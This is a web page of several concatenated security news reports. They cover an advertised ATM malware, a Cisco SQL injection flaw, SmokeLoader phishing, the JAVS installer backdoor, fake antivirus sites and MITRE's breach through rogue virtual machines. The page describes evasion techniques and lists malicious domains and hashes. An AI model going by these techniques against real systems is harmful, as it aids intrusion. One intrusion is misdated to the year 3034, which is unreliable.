About the Author:  Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications. She is also a regular writer at Bora.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, cybersecurity)

Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.

A threat actor is advertising a new ATM malware family that claims to be able of compromised 99% of devices in Europe. The threat actor is offering the malware for $30,000, he claims that the “EU ATM Malware” is designed from scratch and that can also target approximately 60% of ATMs worldwide.

If the claims are true, this malware poses a significant threat to the global banking industry. According to the announcement, the ATM malware can target machines manufactured by multiple leading vendors, including Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, and Hitachi.

“The developers of this malware claim that it can generate up to $30,000 per ATM, making it a lucrative tool for cybercriminals.” reported the website DailyDarkweb. “The malware is fully automated, simplifying its deployment and operation.”

The malware is fully automated, making its deployment and operation straightforward and efficient, however, it also supports a manual operation mode.

The seller is offering the malware with multiple payment options, including a monthly subscription and an initial fee plus a share of the profits from successful jackpotting operations.

The threat actors also give customers a test payload option valid for three days.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

Cisco addressed a SQL injection vulnerability in the web-based management interface of the Firepower Management Center (FMC) Software. 

Cisco addressed a vulnerability, tracked as CVE-2024-20360 (CVSS score 8.8), in the web-based management interface of the Firepower Management Center (FMC) Software. 

The vulnerability is a SQL injection issue, an attacker can exploit the flaw to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. The attacker can exploit this vulnerability only if it has at least Read Only user credentials.

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.” reads the advisory. “This vulnerability exists because the web-based management interface does not adequately validate user input. An attacker could exploit this vulnerability by authenticating to the application and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. To exploit this vulnerability, an attacker would need at least Read Only user credentials.”

Cisco states that there are no workarounds that address this vulnerability. The IT giant has confirmed that this vulnerability does not affect Adaptive Security Appliance (ASA) Software or Firepower Threat Defense (FTD) Software.

The Cisco Product Security Incident Response Team (PSIRT) is not aware attacks in the wild exploiting this vulnerability.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, SQL Injection)

The Ukraine CERT-UA warns of a concerning increase in cyberattacks attributed to the financially-motivated threat actor UAC-0006.

The Computer Emergency Response Team of Ukraine (CERT-UA) warned of surge in in cyberattacks linked to the financially-motivated threat actor UAC-0006.

UAC-0006 has been active since at least 2013. The threat actors focus on compromising accountants’ PCs (which are used to support financial activities, such as access to remote banking systems), stealing credentials, and making unauthorized fund transfers.

The government experts reported that the group carried out at least two massive campaigns since May 20, threat actors aimed at distributing SmokeLoader malware via email.

SmokeLoader acts as a loader for other malware, once it is executed it will inject malicious code into the currently running explorer process (explorer.exe) and downloads another payload to the system.

“Starting from May 20th, hackers have launched at least two massive campaigns with emails containing the SmokeLoader malware.” read the advisory published by CERT-UA.

The attackers sent out emails with ZIP archives containing an IMG files that serves as decoys for hidden EXE malware and ACCDB documents. The documents are weaponized Microsoft Access files, upon enabling the malicious macros they execute PowerShell commands to download and run EXE files.

The researchers observed that following the initial infection, additional malware such as TALESHOT and RMS are downloaded onto the targeted PC.

The UAC-0006 actor is using a botnet composed of several hundred infected machines.

“Currently, UAC-0006’s bot network consists of several hundred infected machines. CERT-UA believes that hackers may soon activate fraudulent schemes using remote banking systems.” continues the report.

CERT-UA warned Ukrainian CEOs to enhance cybersecurity measures for accountants’ automated workplaces. IT shared indicators of compromise for this campaign and is urging to implement proper security policies and protection mechanisms.

In May 2023, Ukraine’s CERT-UA warned of another phishing campaign aimed at distributing the SmokeLoader malware in the form of a polyglot file.

UAC-0006 is the most active financially-motivated threat actor targeting Ukraine businesses, has already attempted to steal tens of million hryvnias through mass online theft campaigns in August-October 2023.

CERT-UA published an article that provides more details of the group’s TTPs.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

International Press – Newsletter

Cybercrime

Healthcare company WebTPA discloses breach affecting 2.5 million people    

Cybercriminals Are Targeting Elections In India With Influence Campaigns 

Laundering cash from healthcare, romance scams lands US man in prison for a decade

He Trained Cops to Fight Crypto Crime—and Allegedly Ran a $100M Dark-Web Drug Market  

Man behind deepfake Biden robocall indicted on felony charges, faces $6M fine

Dark Web Profile: Dispossessor Ransomware   

Malware

Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns  

GitCaught: Threat Actor Leverages GitHub Repository for Malicious Infrastructure 

Spyware found on US hotel check-in computers 

A Catalog of Hazardous AV Sites – A Tale of Malware Hosting   

CVE-2024-4978: Backdoored Justice AV Solutions Viewer Software Used in Apparent Supply Chain Attack  

Malware Transmutation! – Unveiling the Hidden Traces of BloodAlchemy

Hacking 

Two Santa Cruz students uncover security bug that could let millions do their laundry for free 

QNAP QTS zero-day in Share feature gets public RCE exploit

Linguistic Lumberjack: Attacking Cloud Services via Logging Endpoints (Fluent Bit – CVE-2024-4323)

Positive Technologies detects a series of attacks via Microsoft Exchange Server      

Usage of TLS in DDNS Services leads to Information Disclosure in Multiple Vendors

Infiltrating Defenses: Abusing VMware in MITRE’s Cyber Intrusion  

Google fixes eighth actively exploited Chrome zero-day this year

Intelligence and Information Warfare 

IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders

Russia’s New Counterspace Weapon Is in the Same Orbit as a US Satellite 

Operational Monitoring and Control Of Small Arms Weapons Within the People’s Liberation Army 

Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea        

Putin hijacked Austria’s spy service. Now he’s going after its government  

Cybersecurity   

Palantir’s Military AI Tech Conference Sounds Absolutely Terrifying  

UK watchdog looking into Microsoft AI taking screenshots

Wargames director Jackie Schneider on why cyber is one of ‘the most interesting scholarly puzzles’   

US Looks to Create Paranoia Amongst Hackers to Fight Ransomware Gangs, but How?       

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Malicious actors compromised the JAVS Viewer installer to deliver the RustDoor malware in a supply chain attack.

Rapid7 researchers warned that threat actors added a backdoor to the installer for the Justice AV Solutions JAVS Viewer software.

The attackers were able to inject a backdoor in the JAVS Viewer v8.3.7 installer that is being distributed from the JAVS’ servers.

Justice AV Solutions (JAVS) is a U.S.-based company providing digital audio-visual recording solutions for courtroom settings and other environments, including jails, councils, and lecture rooms. The JAVS Viewer has over 10,000 installations globally. The backdoor delivered by the researchers allows attackers to gain full control of infected systems. Rapid7 experts recommend to re-image the affected systems, reset associated credentials, and install the latest version of JAVS Viewer (v8.3.8 or higher).

The researchers noticed that the installer for JAVS Viewer Setup 8.3.7.250-1.exe was digitally signed with an unexpected Authenticode signature and included a binary called fffmpeg.exe. The binary executed encoded PowerShell scripts, Rapid7 linked fffmpeg.exe to the GateDoor/Rustdoor malware, which was identified by security firm S2W.

“Both the fffmpeg.exe binary and the installer binary are signed by an Authenticode certificate issued to “Vanguard Tech Limited”. This is unexpected, as it was noted that other JAVS binaries which appear legitimate are signed by a certificate issued to “Justice AV Solutions Inc”.” reads the report published by Rapid7. “Searching VirusTotal for other files signed by “Vanguard Tech Limited” shows the following.

“The above suggests that there may be one other version of the malicious installer (SHA1: b8e97333fc1b5cd29a71299a8f82a541cabf4d59) and one other malicious fffmpeg.exe (SHA1: b9d13055766d792abaf1d11f18c6ee7618155a0e). These binaries were first seen on the VirusTotal platform April 1, 2024.”

The researchers discovered two malicious JAVS Viewer packages on the vendor’s server, they were signed with a certificate issued on February 10.

On April 2, 2024, the X user @2RunJack2 first reported of the implant distributed by the official JAVS downloads page.

Rapid7 published Indicators of Compromise (IoC) for this attack, below is the attack timeline:

• Feb 10, 2024: A certificate is issued for the subject Vanguard Tech Limited, which the certificate indicates is based in London.
• Feb 21, 2024: The first of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
• April 2, 2024: The Twitter user @2RunJack2 tweets about malware being served by the official JAVS downloads page. It’s not stated whether the vendor was notified.
• Mar 12, 2024: The second of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
• May 10, 2024: Rapid7 investigates a new alert in a Managed Detection and Response customer environment. The source of the infection is traced back to an installer that was downloaded from the official JAVS site. The malware file that was downloaded by the victim, the first Viewer package, is not observed to be accessible on the vendor’s download page. It’s unknown who removed the malicious package from the downloads page (i.e., the vendor or the threat actor).
• May 12, 2024: Rapid7 discovers three additional malicious payloads being hosted on the threat actor’s C2 infrastructure over port 8000: chrome_installer.exe, firefox_updater.exe, and OneDriveStandaloneUpdater.exe.
• May 13, 2024: Rapid7 identifies an unlinked installer file containing malware, the second Viewer package, still being served by the official vendor site. This confirms that the vendor site was the source of the initial infection.
• May 17, 2024: Rapid7 discovers that the threat actor removed the binary OneDriveStandaloneUpdater.exe from C2 infrastructure and replaced it with a new binary, ChromeDiscovery.exe. This indicates that the threat actor is actively updating their C2 infrastructure.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, JAVS Viewer)

Threat actors used fake AV websites masquerading as legitimate antivirus products from Avast, Bitdefender, and Malwarebytes to distribute malware.

In mid-April 2024, researchers at Trellix Advanced Research Center team spotted multiple fake AV sites used to distribute info-stealers. The malicious websites hosted sophisticated malicious files such as APK, EXE and Inno setup installer, including Spy and Stealer capabilities.

The fake websites were masquerading as legitimate antivirus products from Avast, Bitdefender, and Malwarebytes.

The sites hosting malware are avast-securedownload.com (Avast.apk), bitdefender-app.com (setup-win-x86-x64.exe.zip), malwarebytes.pro (MBSetup.rar).

Below is the list of malicious websites analyzed by the researchers:

1. avast-securedownload[.]com: Distributes the SpyNote trojan as an Android package file (“Avast.apk”), which, once installed, requests intrusive permissions such as reading SMS messages and call logs, installing and deleting apps, taking screenshots, tracking location, and mining cryptocurrency.
2. bitdefender-app[.]com: Distributes a ZIP archive file (“setup-win-x86-x64.exe.zip”) that was used to deploy the Lumma information stealer.
3. malwarebytes[.]pro: Distributes a RAR archive file (“MBSetup.rar”) that was used to deploy the StealC information stealer malware.

The experts also discovered a malicious Trellix binary that pretends to be Legit (AMCoreDat.exe).

The researchers did not attribute the attacks to a specific threat actor. The report also includes Indicators of Compromise (IoCs) for the attacks employing fake AV websites.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, fake AV websites)

The MITRE Corporation revealed that threat actors behind the December 2023 attacks created rogue virtual machines (VMs) within its environment.

The MITRE Corporation has provided a new update about the December 2023 attack. In April 2024, MITRE disclosed a security breach in one of its research and prototyping networks. The security team at the organization promptly launched an investigation, logged out the threat actor, and engaged third-party forensics Incident Response teams to conduct independent analysis in collaboration with internal experts.

According to the MITRE Corporation, China-linked nation-state actor UNC5221 breached its systems in January 2024 by chaining two Ivanti Connect Secure zero-day vulnerabilities.

MITRE spotted the foreign nation-state threat actor probing its Networked Experimentation, Research, and Virtualization Environment (NERVE), used for research and prototyping. The organization immediately started mitigation actions which included taking NERVE offline. The investigation is still ongoing to determine the extent of information involved.

The organization notified authorities and affected parties and is working to restore operational alternatives for collaboration. 

Despite MITRE diligently following industry best practices, implementing vendor recommendations, and complying with government guidance to strengthen, update, and fortify its Ivanti system, they overlooked the lateral movement into their VMware infrastructure.

The organization said that the core enterprise network or partners’ systems were not affected by this incident.

According to the new update, threat actors exploited zero-day flaws in Ivanti Connect Secure (ICS) and created rogue virtual machines (VMs) within the organization’s VMware environment.

“The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access. They wrote and deployed a JSP web shell (BEEFLUSH) under the vCenter Server’s Tomcat server to execute a Python-based tunneling tool, facilitating SSH connections between adversary-created VMs and the ESXi hypervisor infrastructure.” reads the latest update. “By deploying rogue VMs, adversaries can evade detection by hiding their activities from centralized management interfaces like vCenter. This allows them to maintain control over compromised systems while minimizing the risk of discovery.”

The attackers deployed rogue virtual machines (VMs) to evade detection by hiding their activities from centralized management interfaces like vCenter. This tactic allows them to control the compromised systems while minimizing the risk of discovery.

On January 7, 3034, the adversary accessed VMs and deployed malicious payloads, including the BRICKSTORM backdoor and a web shell tracked as BEEFLUSH, enabling persistent access and arbitrary command execution.

The hackers relied on SSH manipulation and script execution to maintain control over the compromised systems. Mitre noted attackers exploiting a default VMware account to list drives and generate new VMs, one of which was removed on the same day. BRICKSTORM was discovered in directories with local persistence setups, communicating with designated C2 domains. BEEFLUSH interacted with internal IP addresses, executing dubious scripts and commands from the vCenter server’s /tmp directory

In the following days, the threat actors deployed additional payloads on the target infrastrcuture, including the WIREFIRE (aka GIFTEDVISITOR) web shell, and the BUSHWALK webshell for data exfiltration.

The threat actors exploited a default VMware account, VPXUSER, to make API calls for enumerating drives. They bypassed detection by deploying rogue VMs directly onto hypervisors, using SFTP to write files and executing them with /bin/vmx. These operations were invisible to the Center and the ESXi web interface. The rogue VMs included the BRICKSTORM backdoor and persistence mechanisms, configured with dual network interfaces for communication with both the Internet/C2 and core administrative subnets.

“Simply using the hypervisor management interface to manage VMs is often insufficient and can be pointless when it comes to dealing with rogue VMs.” continues the update. “This is because rogue VMs operate outside the standard management processes and do not adhere to established security policies, making them difficult to detect and manage through the GUI alone. Instead, one needs special tools or techniques to identify and mitigate the risks associated with rogue VMs effectively.”

MITRE shared two scripts, Invoke-HiddenVMQuery and VirtualGHOST, that allow admins to identify and mitigate potential threats within the VMware environment. The first script, developed by MITRE, Invoke-HiddenVMQuery is written in PowerShell and serves to detect malicious activities. It scans for anomalous invocations of the /bin/vmx binary within rc.local.d scripts.

“As adversaries continue to evolve their tactics and techniques, it is imperative for organizations to remain vigilant and adaptive in defending against cyber threats. By understanding and countering their new adversary behaviors, we can bolster our defenses and safeguard critical assets against future intrusions.” MITRE concludes.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, China)

GitLab addressed a high-severity cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to take over user accounts.

GitLab fixed a high-severity XSS vulnerability, tracked as CVE-2024-4835, that allows attackers to take over user accounts.

An attacker can exploit this issue by using a specially crafted page to exfiltrate sensitive user information.

The vulnerability impacts versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1.

The flaw was addressed with the release of versions 17.0.1, 16.11.3, and 16.10.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).

“A XSS condition exists within GitLab in versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1.” reads the advisory published by the company. “By leveraging this condition, an attacker can craft a malicious page to exfiltrate sensitive user information.”

matanber reported this vulnerability through our HackerOne bug bounty program, he received a $10,270 bounty.

Below is the list of vulnerabilities addressed by the company:

In early May, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a GitLab Community and Enterprise Editions improper access control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

The issue, tracked as CVE-2023-7028 (CVSS score: 10.0), is an account takeover via Password Reset. The flaw can be exploited to hijack an account without any interaction.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, XSS)